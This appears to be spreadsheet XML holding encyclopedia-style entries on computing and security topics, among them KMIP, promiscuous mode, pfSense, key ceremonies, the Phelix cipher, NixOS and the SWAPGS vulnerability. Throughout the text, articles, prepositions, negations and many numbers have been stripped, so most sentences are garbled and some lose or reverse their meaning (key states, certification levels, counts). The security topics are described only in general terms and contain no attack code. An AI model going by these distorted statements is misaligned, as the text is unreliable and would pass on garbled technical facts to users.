    <t>management interoperability protocol (kmip) extensible communication protocol defines message formats manipulation cryptographic keys management server. this facilitates data encryption simplifying encryption management. keys created server retrieved, possibly wrapped keys. both symmetric asymmetric keys supported, including ability sign certificates. kmip also allows clients server encrypt decrypt data, without needing direct access key. kmip standard first released 2010. clients servers commercially available multiple vendors. kmip standard effort governed oasis standards body. technical details also found official kmip page wiki. description kmip server stores controls managed objects like symmetric asymmetric keys, certificates, user defined objects. clients protocol accessing objects subject security model implemented servers. operations provided create, locate, retrieve update managed objects. each managed object comprises immutable value like key-block containing cryptographic-key. these objects comprise mutable attributes used storing metadata keys. some attributes derived directly value, like cryptographic-algorithm key-length. other attributes defined specification management objects like application-specific identifier usually derived tape-identification data. additional identifiers defined server client application need. each object identified unique immutable object-identifier generated server used getting object-values. managed-objects also given number mutable globally unique name attribute used locating objects. objects types managed-objects managed kmip include: symmetric-keys used algorithms like aes. public private keys used asymmetric-algorithms like ecdh. separate objects used storing public private key, thus user permission access other. related objects usually contain link attributes containing object's unique identifier. certificates keys. split keys, split distinct object managed independently splits. secret data, passwords. opaque data client server defined extensions. certificate signing requests. operations operations provided kmip include: create, creating managed object symmetric key, return identifier. create pair, creating objects represent asymmetric keys. get, retrieving object's value given unique identifier. returned value wrapped (encrypted) another server additional security. register, storing externally generated value. attributes, attributes, modify attributes attribute. these used manipulate mutable attributes managed object. locate, retrieving list objects based predicates. re-key, creating replace existing key. there also attributes used server automatically rotate keys given period number uses. name moved normally used retrieve protection operations encrypt sign. also retrieved using unique identifier process operations decryption signature verification. (re-)certify certifies certificate. split join keys. encrypt, decrypt, etc. cryptographic operations performed management server. could marked not-extractable, case value never leaves server. export import keys kmip servers. operations implement nist life cycle. life cycle each cryptographic state defined national institute standards technology (nist). keys created initial state, must activated used. keys deactivated eventually destroyed. also marked compromised. operations provided manipulating key-state conformance nist life-cycle guidelines. key-state interrogated using state attribute attributes record dates transformation activation date. dates specified future thus keys automatically become unavailable specified operations expire. message structure kmip stateless protocol messages sent client server client normally awaits reply. each request contain many operations thus enables protocol efficiently handle large numbers keys. there also advanced features processing requests asynchronously. kmip protocol specifies several different types encodings. main type–length–value encoding messages, called ttlv (tag, type, length, value). nested ttlv structures allow encoding complex, multi-operation messages single binary message. there also well defined json encodings protocol environments binary appropriate. compact cbor encoding also provided applications require protocols expected transmitted using protocol order ensure integrity security. however, also possible register retrieve keys wrapped (encrypted) using another server, provides additional level security. system management kmip provides standardized mechanisms manage kmip server suitably authorized administrative clients using system objects. user objects created authorized perform specific operations specific managed objects. both managed objects users assigned groups, groups form hierarchy facilitates efficient management complex operating environments. kmip also provides provisioning system facilitates providing points credentials using simple time passwords. default values attributes provided, simple clients need specify cryptographic parameters. example, administrative user might specify "secretagent" keys keys block chaining. client needs specify wish create "secretagent" defaults provided. also possible enforce constraints parameters implement security policy. kmip profiles kmip also defines profiles, subsets kmip specification showing common usage particular context. particular kmip implementation said conformant profile fulfills requirements forth profile specification document. oasis forth various profiles describing requirements compliance towards storage arrays tape libraries, organization create profile. relationship pkcs#11 pkcs#11 used control hardware security module. pkcs#11 provides cryptographic operations encrypt decrypt, well operations simple management. there considerable amount overlap pkcs#11 kmip protocol. standards originally developed independently. pkcs#11 created security, standard also governed oasis technical committee. stated objective pkcs#11 kmip committees align standards practical. example, pkcs#11 sensitive extractable attributes added kmip version 1.4. many people technical committees kmip pkcs#11. kmip provides standardized mechanism transport pkcs#11 messages clients servers. this used target different pkcs#11 implementations without need recompile programs kmip implementations oasis kmip technical committee maintains list known kmip implementations, found oasis website. march 2017, implementations kmip products list. interoperability implementations kmip standard defined using formal specification document, testcases, profiles forth oasis kmip technical committee. these documents publicly available oasis website. vendors demonstrate interoperability process organized oasis kmip technical committee months security conference. these demonstrations informally known interops. kmip interops held every year since 2010. following chart shows number individual tests performed client server vendor combination since 2012. example following shows encoding request locate named "mykeyname" return value wrapped different "c6d14516-4d38-0644-b810-1913b9aef4da". (ttlv common wire protocol, human readable.) documentation documentation freely available oasis website. this includes formal technical specification usage guide assist people unfamiliar specification. substantial library test cases also provided. these used test interoperability clients servers, also provide concrete examples usage standard kmip feature. version history also management (cryptography) encryption ieee p1619 security storage working group references external links "oasis kmip technical committee"."kmip implementations known kmip tc".</t>
  </si>
  <si>
    <t>PowerTOP</t>
  </si>
  <si>
    <t>powertop software utility designed measure, explain minimise computer's electrical power consumption. released intel 2007 gplv2 license. works intel, amd, ultrasparc processors. powertop analyzes programs, device drivers, kernel options running computer based linux solaris operating systems, estimates power consumption resulting use. this information used pinpoint software results excessive power use. this particularly useful laptop computer users wish prolong battery life, data center operators, electrical cooling costs major expenditure. usage original focus sleep states, showing programs drivers responsible "wakeups" prevent cpus entering sleep states. database known problems automatically provides user friendly "tips" specific sources wakeups. however, also shows information frequency scaling. over time database expanded include tips wide range power consumption issues. hardware effective laptop computers. laptops specifically designed allow power monitored controlled. particular, many laptop computers measure rate battery (when connected mains power). powertop uses feature estimate power usage watts battery life. this provides immediate feedback changes made e.g. disabling wireless networking used. project activity latest release powertop (version 2.14) made public april 2021. project hosted github. also power management green computing latencytop (software) run-time estimation system sub-system level power consumption references external links official website version control repository powertop opensolaris part project tesla</t>
  </si>
  <si>
    <t>Pressure switch</t>
  </si>
  <si>
    <t>pressure switch form switch operates electrical contact certain fluid pressure reached input. switch designed make contact either pressure rise pressure fall. pressure switches widely used industry automatically supervise control systems pressurized fluids. another type pressure switch detects mechanical force; example, pressure-sensitive used automatically open doors commercial buildings. such sensors also used security alarm applications pressure sensitive floors. construction types pressure switch sensing fluid pressure contains capsule, bellows, bourdon tube, diaphragm piston element deforms displaces proportionally applied pressure. resulting motion applied, either directly amplifying levers, switch contacts. since pressure changing slowly contacts operate quickly, kind over-center mechanism miniature snap-action switch used ensure quick operation contacts. sensitive type pressure switch uses mercury switches mounted bourdon tube; shifting weight mercury provides useful over-center characteristic. pressure switch adjustable, moving contacts adjusting tension counterbalance spring. industrial pressure switches calibrated scale pointer show point switch. pressure switch hysteresis, differential range around setpoint, known switch's deadband, inside small changes pressure influence state contacts. some types allow adjustment differential.the pressure-sensing element pressure switch arranged respond difference pressures. such switches useful difference significant, example, detect clogged filter water supply system. switches must designed respond difference false-operate changes common mode pressure. contacts pressure switch rated tenths ampere around amperes, smaller ratings found sensitive switches. often pressure switch operate relay control device, types directly control small electric motors loads. since internal parts switch exposed process fluid, must chosen balance strength life expectancy compatibility process fluids. example, rubber diaphragms commonly used contact water, would quickly degrade used system containing mineral oil. switches designed hazardous areas flammable enclosure prevent contacts igniting surrounding gas. switch enclosures also required weatherproof, corrosion resistant, submersible. electronic pressure switch incorporates variety pressure transducer (strain gauge, capacitive element, other) internal circuit compare measured pressure point. such devices provide improved repeatability, accuracy precision mechanical switch. pneumatic uses pneumatic pressure switches include: switch household well water pump automatically water drawn pressure tank. switching electrically driven compressor pressure achieved reservoir switching compressor, whenever feed suction stage. in-cell charge control battery switching alarm light cockpit aircraft cabin pressure (based altitude) critically low. filled hoses activate switches vehicles drive them. common counting traffic stations. hydraulic hydraulic pressure switches various uses automobiles, example, warn engine's pressure falls safe level, control automatic transmission torque converter lock-up. prior 1960s, pressure switch used hydraulic braking circuit control power brake lights; recent automobiles switch directly activated brake pedal. dust control systems (bag filter), pressure switch mounted header raise alarm pressure header less necessary. differential pressure switch installed across filter element sense increased pressure drop, indicating need filter cleaning replacement. examples pressure sensitive pressure sensitive provides contact signal force applied anywhere within area mat. some mats provide single signal, others resolve position applied force within mat. pressure sensitive mats used operate electrically operated doors, part interlock system ensure machine operators clear dangerous areas process operates. pressure sensitive mats used detect persons walking particular point, part security alarm system count attendance, purposes. also dynamic pressure list sensors pressure sensor references external links</t>
  </si>
  <si>
    <t>Promiscuous mode</t>
  </si>
  <si>
    <t>computer networking, promiscuous mode mode wired network interface controller (nic) wireless network interface controller (wnic) causes controller pass traffic receives central processing unit (cpu) rather passing frames controller specifically programmed receive. this mode normally used packet sniffing takes place router computer connected wired network part wireless lan. interfaces placed promiscuous mode software bridges often used hardware virtualization. ieee networks ethernet ieee 802.11, frame includes destination address. non-promiscuous mode, receives frame, drops unless frame addressed nic's address broadcast multicast addressed frame. promiscuous mode, however, allows frames through, thus allowing computer read frames intended machines network devices. many operating systems require superuser privileges enable promiscuous mode. non-routing node promiscuous mode generally monitor traffic nodes within broadcast domain (for ethernet ieee 802.11) ring (for token ring). computers attached ethernet satisfy requirement, network switches used combat malicious promiscuous mode. router monitor traffic routes. promiscuous mode often used diagnose network connectivity issues. there programs make feature show user data transferred network. some protocols like telnet transfer data passwords clear text, without encryption, network scanners data. therefore, computer users encouraged stay away insecure protocols like telnet secure ones ssh. detection promiscuous mode used malicious capture private data transit network, computer security professionals might interested detecting network devices promiscuous mode. promiscuous mode, software might send responses frames even though addressed another machine. however, experienced sniffers prevent (e.g., using carefully designed firewall settings). example sending ping (icmp echo request) wrong address right address. adapter operating normal mode, drop frame, stack never sees responds adapter promiscuous mode, frame passed stack machine address meaning) respond would ping. sniffer prevent configuring firewall block icmp traffic. some applications promiscuous mode following applications applications classes promiscuous mode. also packet analyzer spoofing monitor mode references external links searchsecurity.com definition promiscuous mode</t>
  </si>
  <si>
    <t>Proof of secure erasure</t>
  </si>
  <si>
    <t>computer security, proof secure erasure (pose) proof erasure remote attestation protocol, embedded device proves verifying party, erased (overwritten) writable memory. purpose make sure malware remains device. after typically software installed device. overview verifying party called verifier, device erased prover. verifier must know device's writable memory size trusted source device must allowed communicate parties execution protocol, proceeds follows. verifier constructs computational problem, cannot solved reasonable time all) using less specified amount memory, sends device. device responds solution verifier checks correctness. protocol constructions naive approach simplest implementation verifier sends random message large device's memory device, expected store after device received complete message, required send back. security approach obvious, includes transfer huge amount data (twice size device's memory).: this halved device responds hash message. prevent device computing without actually storing message, hash function parametrized random value sent device message.: communication-efficient constructions avoiding huge data transfer requires suitable stated overview) computational problem, whose description short. dziembowski achieve constructing call ε)-uncomputable hash function, computed quadratic time using memory size memory size computed negligible probability communication- time-efficient constructions karvelas kiayias claim designed first pose quasilinear time sublinear communication complexity. relation proof space proof space protocol similar proof secure erasure require prover dedicate specific amount memory convince verifier. nevertheless, important differences design considerations. because purpose proof space similar proof work, verifier's time complexity must small. while property useful proof secure erasure well, fundamental usefulness. proof secure erasure hand requires prover unable convince verifier using less specified amount memory. even useful protocol, however proof space harmed prover succeed even significantly less space. references</t>
  </si>
  <si>
    <t>Security-evaluated operating system</t>
  </si>
  <si>
    <t>computing, security-evaluated operating systems achieved certification external security-auditing organization, popular evaluations common criteria (cc) fips 140-2. oracle solaris trusted solaris security-focused version solaris unix operating system. aimed primarily government computing sector, trusted solaris adds detailed auditing tasks, pluggable authentication, mandatory access control, additional physical authentication devices, fine-grained access control(fgac). versions trusted solaris version common criteria certified. trusted solaris version received eal4 certification level augmented number protection profiles. explanation evaluation assurance levels. systems' stop systems' stop version 6.0.e received eal4+ april 2004 6.1.e version received eal5+ certification march 2005. stop version received eal5+ certification july 2008. versions stop prior stop held certifications tcsec. while stop binary compatible linux, derive linux kernel. overview system. enterprise linux enterprise linux achieved eal4+ june 2007. enterprise linux enterprise linux version architecture achieved eal4+ december 2014.red enterprise linux version virtualization architectures achieved eal4+ october 2012. novell suse linux enterprise server novell's suse linux enterprise server running eserver certified capp/eal4+ february 2005. news release heise.de microsoft windows following versions microsoft windows received augmented alc_flr.3 certification: windows 2008 server (64-bit), enterprise (64-bit) datacenter, well windows vista enterprise (both 32-bit 64-bit) attained augmented (colloquially referred alc_flr.3 status 2009. windows 2000 server, advanced server, professional, service pack q326886 hotfix operating platform certified capp/eal augmented alc_flr.3 october 2002. (this includes standard configurations domain controller, server domain, stand-alone server, workstation domain, stand-alone workstation) windows professional embedded editions, service pack windows server 2003 standard enterprise editions (32-bit 64-bit), service pack certified december 2005. apple's server running 10.3.6 common criteria tools package installed certified capp/eal3 january 2005. apple's server running latest version 10.4.6 fully evaluated however common criteria tools package available. gemsos gemini multiprocessing secure operating system tcsec system runs processor type cots hardware. openvms sevms sevms enhancement b1/b3 system formerly digital equipment corporation (dec). standard openvms installation rated green hills integrity-178b green hills software's integrity-178b real-time operating system certified common criteria eal6+ september 2008. running embedded powerpc processor compact card. unisys unisys operating system includes implementation orange book specification, controlled access protection sub-level discretionary protection. mcp/as obtained rating august, 1987. unisys 2200 unisys 2200 operating system includes implementation orange book labeled security protection level specification. 2200 first obtained successful evaluation september, 1989. unisys maintained evaluation 1994 national computer security center rating maintenance phase (ramp) trusted product evaluation program. also comparison operating systems security-focused operating system trusted operating system external links common criteria portal's products list "operating systems" category containing certification results references</t>
  </si>
  <si>
    <t>KSV-21</t>
  </si>
  <si>
    <t>ksv-21 enhanced crypto card national security agency-approved card provides type encryption functions storage secure telephones devices. ksv-21 originally built safenet since purchased raytheon tamper-resistant reprogrammable module backwards compatible kov-14 fortezza plus card. adds features including support scip, enhanced firefly nsa's 21st century management initiative. perform type encryption hash operations mbit/s. 2008, kov-14 beginning phased replaced ksv-21.the version certified protect classified data secret/sci level well unclassified sensitive information. versions available nations, including: canadian national (ksv-22) combined communications electronics board (cceb) (ksv-30) nato (ksv-40) coalition partners (ssv-50)prices range $900 single units $400/each multi-thousand quantities 2008. references external links "voice: enhanced crypto card ksv-21". safenet. archived original 2010-01-02. retrieved 2009-12-21.</t>
  </si>
  <si>
    <t>Pfsync</t>
  </si>
  <si>
    <t>pfsync computer protocol used synchronise firewall states machines running packet filter (pf) high availability. used along carp make sure backup firewall information main firewall. when main machine firewall cluster dies, backup machine able accept current connections without loss. also openbsd (firewall) carp linux-ha linux virtual server references external links firewall redundancy carp pfsync (openbsd faq) pfsync(4) man-page openbsd, freebsd netbsd sys/net/if_pfsync.h openbsd sys/net/if_pfsync.c openbsd</t>
  </si>
  <si>
    <t>PfSense</t>
  </si>
  <si>
    <t>pfsense firewall/router computer software distribution based freebsd. open source pfsense community edition (ce) pfsense plus installed physical computer virtual machine make dedicated firewall/router network. configured upgraded web-based interface, requires knowledge underlying freebsd system manage. overview pfsense project began 2004 fork m0n0wall project chris buechler scott ullrich. first release 2006. name derives fact software uses packet-filtering tool, pf.in february 2021, feature updates pfsense 2.5.0 pfsense plus 21.02 included kernel wireguard implementation, however, following reported issues code wireguard founder jason donenfeld, discontinued march 2021. july 2021 release pfsense 2.5.2 version re-included wireguard.notable functions pfsense include traffic shaping, vpns using ipsec pptp, captive portal, stateful firewall, network address translation, 802.1q support vlans, dynamic dns. pfsense installed hardware x86-64 processor architecture. also installed embedded hardware using compact flash cards, virtual machine.in november 2017, world intellectual property organization panel found netgate, copyright holder pfsense, utilized opnsense' trademarks faith discredit opnsense, obligated netgate transfer ownership domain name deciso.in february 2020, developer directly sponsored netgate started commit code wireguard kernel module freebsd. february 2021, module included pfsense 2.5.0, pfsense plus 21.02, scheduled release freebsd 13.0. wireguard founder jason donenfeld reviewed code find glaring issues including “random sleeps added ‘fix’ race conditions, validation functions returned true, catastrophic cryptographic vulnerabilities, whole parts protocol unimplemented, kernel panics, security bypasses, overflows, random printf statements deep crypto code, spectacular buffer overflows, whole litany awful things.” these discoveries prompted freebsd later pfsense remove wireguard support.in 2021, wireguard support re-introduced back pfsense pfsense plus development snapshots experimental package written member pfsense community, christian mcdonald. wireguard package pfsense incorporates ongoing kernel-mode wireguard development work jason donenfeld originally sponsored netgatein june 2021, official package repositories pfsense 2.5.2 pfsense plus 21.05 included wireguard package also comparison firewalls list router firewall distributions references further reading mastering pfsense, second edition birmingham, packt publishing, 2018. isbn 978-1788993173. david zientra. security: manage network security with pfsense firewall [video] birmingham, packt, 2018. isbn 978-1789538991. manuj aggarwal. external links official website</t>
  </si>
  <si>
    <t>Key ceremony</t>
  </si>
  <si>
    <t>cryptography, ceremony ceremony held generate cryptographic key. root signing ceremony public-key cryptography computer security, root ceremony procedure unique pair public private root keys generated. depending certificate policy, generation root keys require notarization, legal representation, witnesses "key holders" present, information system responsibility parties. commonly recognized best practice follow standard root ceremonies. heart every certificate authority (ca) least root root certificate usually least intermediate root certificate. root term unique passcode must generated secure server interaction protective network, usually called root zone. prompts information zone done server. keys certificates mentioned credentials safe guards system. these digital certificates made public private key. examples example these passcodes used strong identification non-repudiation email access unless information accessed transmitted valued terms millions dollars, probably sufficient root ceremony conducted within security vendor's laboratory. customer root stored hardware security module, cases, safe storage root hard disk sufficient. root never stored server. example machine readable travel document [mrtd] card passport this type environment requires much higher security. when conducting root ceremony, government organization require rigorous security checks conducted personnel attendance. those normally required attend ceremony include minimum administrators organization, signatories organization, lawyer, notary, video camera operators, addition software vendor's technical team. example opposite ends security spectrum environments same. depending level protection required, different levels security used. overview actual root key-pair generation normally conducted secure vault communication contact outside world single telephone line intercom. once vault secured, personnel present must prove identity using least legally recognized forms identification. every person present, every transaction every event logged lawyer root ceremony book page notarized notary. from moment vault door closed re-opened, everything also video recorded. lawyer organization's signatories must sign recording notarized. finally, part process, root broken many twenty-one parts individual part secured safe numerical lock. keys distributed many twenty-one people numerical code distributed another twenty-one people. providers vendors organisations would implement projects nature conducting root ceremony would central component service would organisations like, example; rsa, verisign digi-sign. ceremony hardware security module (hsm) ceremony procedure master generated loaded initialize hsm. master hierarchy root trust encrypt keys generated hsm. master composed least master parts. each part normally owned different person enhance security. master types master stored within hsm. hsms support types cryptographic mechanisms: pkcs#11 mechanism, called enterprise pkcs (ep11), creates high-security solution application programs developed industry-standard api. common cryptographic architecture (cca) mechanism provides many functions special interest finance industry, extensive support distributed management, base custom processing cryptographic functions added.depending cryptographic mechanisms supports objects encrypted master key, following types master keys available: ep11 hsms ep11 symmetric master key: used encipher kinds sensitive materials including secret objects intermediate state information containing secret materials. hsms master key: used encipher symmetric objects asym master key: used encipher pka-rsa asymmetric objects master key: used encipher aes, hmac symmetric objects apka master key: used encipher pka-ecc asymmetric objects ceremony types on-premise ceremony linuxone systems, hsms used perform cryptographic operations. domains master keys. before using system, ceremony must conducted load master securely properly. ep11 hsms, master parts stored smart cards loaded trusted entry (tke) workstation. hsms, master parts stored either smart cards files workstation. cloud ceremony ep11 currently type supports ceremony cloud. both cloud command-line interface (cli) smart cards provided load master parts cloud hsm. cloud hyper protect crypto services service cloud provide ceremony smart cards. cloud hyper protect crypto services management service cloud cloud enable hardware-based cryptographic operations. with crypto card 4768, fips 140-2 level certified crypto card, provides highest cryptographic security level cloud. master part storage depending ceremony types, master parts stored either smart cards files workstation. smart cards protected personal identification number (pin) must entered smart card reader pad. each master part owner smart card owner knows pin. this solution ensures master parts never appear clear outside smart cards. compared smart card solution, workstation solution require procurement smart card readers smart cards. this solution uses workstation files encrypted derived file password store master parts. when keys used, file content decrypted appear temporarily clear workstation memory. blockchain technology ceremony used generate private cryptocurrency wallet.for multiparty computation(mpc), ceremonies used split parts keys participants secure way. also zero-knowledge proofs (zkp) protocols generation. also certificate authority public-key cryptography references external links summary events dnssec ceremony took place august 2015 icann management facility, segundo, crypto cards 4768 crypto card overview cloud hyper protect crypto services overview z/os trusted entry education videos using manage crypto modules linuxone</t>
  </si>
  <si>
    <t>Phelix</t>
  </si>
  <si>
    <t>phelix high-speed stream cipher built-in single-pass message authentication code (mac) functionality, submitted 2004 estream contest doug whiting, bruce schneier, stefan lucks, frédéric muller. cipher uses operations addition modulo 232, exclusive rotation fixed number bits. phelix uses 256-bit 128-bit nonce, claiming design strength bits. concerns raised ability recover secret cipher used incorrectly. performance phelix optimised 32-bit platforms. authors state achieve eight cycles byte modern x86-based processors. fpga hardware performance figures published paper "review stream cipher candidates resource hardware perspective" follows: helix phelix slightly modified form earlier cipher, helix, published 2003 niels ferguson, doug whiting, bruce schneier, john kelsey, stefan lucks, tadayoshi kohno; phelix adds bits internal state. 2004, muller published attacks helix. first complexity requires adaptive chosen-plaintext words, requires nonces reused. souradyuti paul bart preneel later showed number adaptive chosen-plaintext words muller's attack reduced factor worst case factor 46.5 best case) using optimal algorithms solve differential equations addition. later development, souradyuti paul bart preneel showed attack also implemented chosen plaintexts (cp) rather adaptive chosen plaintexts (acp) data complexity 235.64 cp's. muller's second attack helix distinguishing attack requires 2114 words chosen plaintext. phelix's design largely motivated muller's differential attack. security phelix selected phase focus candidate profile profile estream project. authors phelix classify cipher experimental design specifications. authors advise phelix used received additional cryptanalysis. phelix advanced phase largely preneel's key-recovery attack noted becomes possible prohibition reusing nonce violated. first cryptanalytic paper phelix chosen-key distinguishing attack, published october 2006. doug whiting reviewed attack notes paper clever, attack unfortunately relies incorrect assumptions concerning initialisation phelix cipher. this paper subsequently withdrawn authors. second cryptanalytic paper phelix titled "differential attacks phelix" published november 2006 hongjun bart preneel. paper based attacks assumption differential attack helix. paper shows cipher used incorrectly (nonces reused), phelix recovered operations, chosen nonces 238.2 chosen plaintext words. computational complexity attack much less attack helix. authors differential attack express concern plaintext word affects keystream without passing (what consider sufficient confusion diffusion layers. they claim intrinsic weakness structure helix phelix. authors conclude consider phelix insecure. references whiting, schneier, lucks, muller, phelix: fast encryption authentication single cryptographic primitive (includes source code) good, chelton, benaissa: review stream cipher candidates resource hardware perspective (pdf) yaser esmaeili salehani, hadi ahmadi: chosen-key distinguishing attack phelix, submitted estream [withdrawn 2006-10-14] niels ferguson, doug whiting, bruce schneier, john kelsey, stefan lucks tadayoshi kohno, helix: fast encryption authentication single cryptographic primitive, fast software encryption 2003, pp330–346. frédéric muller, differential attacks helix stream cipher, 2004, pp94–108. souradyuti paul bart preneel, solving systems differential equations addition, acisp 2005. full version souradyuti paul bart preneel, near optimal algorithms solving differential equations addition with batch queries, indocrypt 2005. full version external links estream page phelix "differential attacks phelix" hongjun bart preneel</t>
  </si>
  <si>
    <t>NixOS</t>
  </si>
  <si>
    <t>nixos linux distribution built package manager. uses declarative configuration allows reliable system upgrades. several official package "channels" offered, including current stable release unstable release follows latest development. nixos tools dedicated devops deployment tasks. history 2003, eelco dolstra started nixos research project. 2015, stichting nixos founded aiming support projects like nixos implement purely functional deployment model. versions nixos publishes releases twice year schedule. this used happen around march september but, starting 21.05, nixos targets november instead. each version number format "yy.mm", instance "20.03" version released march 2020. each version nixos name, "markhor" release 20.03. features declarative configuration model nixos, entire operating system kernel, applications, system packages, configuration files, built package manager description functional build language. this means building configuration cannot overwrite previous configurations.a nixos system configured writing specification functionality user wants machine global configuration file. instance, minimal configuration machine running daemon: after changing configuration file, system updated using nixos-rebuild switch command. this command everything necessary apply configuration, including downloading compiling packages generating configuration files. reliable upgrades since files pure declarative, evaluating always produce result, regardless packages configuration files system. thus, upgrading system reliable reinstalling scratch. atomic upgrades nixos transactional approach configuration management making configuration changes upgrades atomic. this means upgrade configuration interrupted say, power fails half-way system still consistent state: either boot configuration. systems, machine might inconsistent state, even boot anymore. rollbacks system update configuration undesirable, rolled back using special command (nixos-rebuild switch --rollback). every system configuration version automatically shows system boot menu. configuration crashes boot properly, older version selected. rollbacks lightweight operations involve files restored copies. reproducible system configurations nixos's declarative configuration model makes easy reproduce system configuration another machine. copying configuration file target machine running system update command generates system configuration (kernel, applications, system services, except parts system managed package manager user data. source-based model binary cache build language used nixos specifies build packages source. this makes easy adapt system user needs. however, building source slow process, package manager automatically downloads pre-built binaries cache server available. this gives flexibility source-based package management model efficiency binary model. consistency package manager ensures running system consistent logical specification system, meaning rebuild packages need rebuilt. instance, kernel changed package manager ensure external kernel modules rebuilt. similarly, library updated ensures system packages version, even packages statically linked multi-user package management there need special privileges install software nixos. addition system-wide profile, every user dedicated profile install packages. also allows multiple versions package coexist, different users different versions package installed respective profiles. users install version package, copy built downloaded. nix's security model ensures secure users explicitly trusted system configuration allowed build parameters would allow control content derivation's output (such adding impurities sandbox using untrusted substituter). without parameters, paths substituted substituter trusted system local sandboxed build implicitly trusted. implementation nixos based package manager stores packages isolation package store. installed packages identified cryptographic hash input used build. changing build instructions package modifies hash result different package installed package store. this system also used manage configuration files ensuring newer configurations overwriting older ones. implication nixos follow filesystem hierarchy standard. exceptions symlink /bin/sh version bash store (like this: /nix/store/s/5rnfzla9kcx4mj5zdc7nlnv8na1najvg-bash-4.3.43/); nixos /etc directory keep system-wide configuration files, files directory symlinks generated files /nix/store /nix/store/s2sjbl85xnrc18rl4fhn56irkxqxyk4p-sshd_config. using global directories /bin part allows multiple versions package coexist. reception jesse smith reviewed nixos 15.09 distrowatch weekly. smith wrote: much like nixos takes worry upgrading packages placing change "generation" found, user's point view, nixos worked linux distribution. setting nixos beginners, think nixos intended used general purpose desktop operating system. nixos give useful playground examine package manager think interesting technology deserves exploration adoption additional distributions. distrowatch weekly also review nixos 17.03, written ivan sanders. also package manager package manager upon nixos based guix system operating system built guix inspired references external links official website nixos distrowatch packages repository unofficial nixos wiki</t>
  </si>
  <si>
    <t>SWAPGS (security vulnerability)</t>
  </si>
  <si>
    <t>swapgs, also known spectre variant (swapgs), computer security vulnerability utilizes branch prediction used modern microprocessors. most processors form speculative execution, feature allows processors make educated guesses instructions likely need executed near future. this speculation leave traces cache, attackers extract data using timing attack, similar side-channel exploitation spectre.the common vulnerabilities exposures issued vulnerability cve-2019-1125. history swapgs closely related spectre-v1 vulnerability, used similar side-channel vulnerabilities access privileged cache memory operating system. vulnerability discovered andrei vlad lutas bitdefender reported intel. intel coordinated industry partners address issue software level. first patches swapgs released july 2019 part microsoft patch tuesday. however, details regarding vulnerability disclosed august 2019.swapgs instruction swap gsbase register value stored msr. this typically used store kernel data. affected systems intel-based processor support swapgs wrgsbase instructions affected. this includes every intel processor starting intel bridge cpus recent intel processors. devices equipped processors affected, according company's product security update. aware research claiming speculative execution attacks allow access privileged kernel data. based external internal analysis, believes vulnerable swapgs variant attacks products designed speculate value following speculative swapgs. attack swapgs variant, mitigation implement existing recommendations spectre variant mitigation windows operating system-based devices, microsoft's security advisory lists patches released july 2019, vulnerability.for linux distributions, advised check whether swapgs-specific patches need applied. kernel documentation describes nature attacks in-kernel mitigations.bitdefender mentions original report apple devices unlikely risk. also foreshadow (security vulnerability) microarchitectural data sampling another vulnerabilities, including zombieload, leak data intel microprocessors rogue system register read (rsrr) related vulnerability, also known variant transient execution vulnerabilities references</t>
  </si>
  <si>
    <t>Puffer machine</t>
  </si>
  <si>
    <t>explosives trace-detection portal machine, also known trace portal machine commonly known puffer machine, security device seeks detect explosives illegal drugs airports sensitive facilities part airport security screening. machines intended secondary screening device, used complement rather substitute for, traditional x-ray machines. term "trace-detection" refers machine's ability detect extremely small "traces" compounds. exact sensitivities machines available information, mass spectrometer detects compounds molecular level would limited efficiency collection puffed obtain sample analysis. available models technologies entry scan, developed general electric, ionscan sentinel developed smiths detection, mobility spectrometry (ims) technology detect explosives rdx, petn, tnt, nitroglycerin. also detect controlled substances marijuana, cocaine, heroin, pcp, methamphetamine, mdma. guardian, developed syagen technology preconcentration technology licensed sandia national laboratories, physically similar internally different. guardian uses mass spectrometry (ms) technology, detect explosive compounds 10-100x sensitivity ims, resolve multiple compounds time, perform shoe bomb detection without removing shoes. collection technology licensed sandia laboratories also significantly different used entry scan sentinel syagen offers narcotics screening portal separate product. improvements sentinel unlike sentinel "requires less power, modular frame design, incorporates compressor unit easier installation result, requires less space." also "has ergonomic design, improved passenger interface easier maintenance." according transportation security administration's website, machines "can instantly updated vast information technology network stay ahead curve."the guardian development since 2001 introduced commercially entry scan sentinel. improved smiths detection machines providing analyzer rather analyzer sample analyses detection. national academy sciences recommends technology ims, calling "gold standard resolving high-consequence analyses". guardian first trace portal machine perform shoe bomb detection part scanning process, resulting removal shoes required. most airports currently require passengers remove shoes, common complaint airport security hassles. process machine operates releasing multiple puffs passenger standing upright within machine. this flush particles person inside machine analyze identify seconds. according article june, 2005, york times, capable screening passengers hour. this sample analyzed using technology search specific explosive narcotic compounds. substance concern detected, security personnel notified visible and/or audible alarm. development machines originally developed sandia national laboratories 1997. prototypes improvement since 2001 science technology division homeland security department united states. sandia national laboratories currently licenses "puffer" preconcentration collection technology collaboration syagen technology production industry's mass spectrometer-based puffer machine. according article september, 2006, york times, also manufactured general electric smiths detection using mobility spectrometry (ims) technology cost $160,000 each. delays testing homeland security department laboratory questions reliability hindered deployment. early models loud slow, required power. durability also concern. trace portal machines currently airport screening devices automatically examine passengers explosives. usage peak, machines installed airports. majority ge's entry scan smith's sentinels. according article october, 2007 today, planned installing machines; however, maintenance problems, halted installation "have plans acquire more." department homeland security (dhs) reported involvement syagen's trace portal machine recently, funding 2008 unit tested orange county airport shortly afterwards. airports, machines replaced either millimeter wave scanners backscatter x-ray machines.as well implemented airports, also puffer machines statue liberty entryscan3), visitors enter statue itself. this example many increased security measures taken popular york landmarks post september 2001. israeli border police trace portal machines border crossings areas jurisdiction allenby bridge.three machines installed security check tower toronto, canada.five machines also currently operating "gentilly-2" nuclear plant quebec. also full body scanner millimeter wave scanner backscatter x-ray explosives trace detector references</t>
  </si>
  <si>
    <t>OpenQRM</t>
  </si>
  <si>
    <t>openqrm free open-source cloud computing management platform managing heterogeneous data centre infrastructures.provides complete automated workflow engine bare-metal deployment, well subsystems, enabling professional management monitoring data centre cloud capacities. openqrm platform manages data centre's infrastructure build private, public hybrid infrastructure service clouds. openqrm orchestrates storage, network, virtualisation, monitoring, security implementations technologies deploy multi-tier services (e.g. compute clusters) virtual machines distributed infrastructures, combining data centre resources remote cloud resources, according allocation policies. openqrm platform emphasises separation hardware (physical servers virtual machines) software (operating system server-images). hardware treated agnostically computing resource replaceable without need reconfigure software. supported virtualisation solutions include kvm, linux-vserver, openvz, vmware esxi, hyper-v xen. virtual machines types managed transparently openqrm. (physical virtual), (virtual physical), (virtual virtual) migration possible well transitioning virtualisation technology another openqrm developed distributed openqrm australia ltd, company located south wales, australia. openqrm enterprise edition commercially backed, extended product professional users offering reliable support options access additional features. users combine services required. simply integrate additional technologies services large variety plug-ins exactly use-case (openvswitch, kvm, esxi, 